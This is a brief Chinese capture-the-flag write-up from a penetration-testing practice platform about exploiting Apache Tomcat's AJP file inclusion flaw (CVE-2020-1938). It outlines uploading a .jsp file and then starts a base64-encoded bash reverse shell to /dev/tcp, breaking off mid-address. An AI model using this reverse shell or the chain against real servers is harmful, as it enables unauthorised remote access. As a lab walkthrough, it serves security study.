安鸾渗透实战平台(中间件) Apache Tomcat AJP 文件包含漏洞(CVE-2020-1938 ) (150分)
漏洞环境安鸾渗透实战平台公网vpsCVE-2020-1938文件包含expbase64加密网站题目:解法:1、访问对应网页网页上可以发现一个明显的上传点,而题目是文件包含漏洞,所以可以编写一个代码代码文件上传,然后使用文件包含就行。由于文件包含不限制后缀,这里直接上传.jsp后缀即可2、制作一个反弹shell文件写一个反弹shell然后拿去base64加密bash-i>&/dev/tcp/1.1.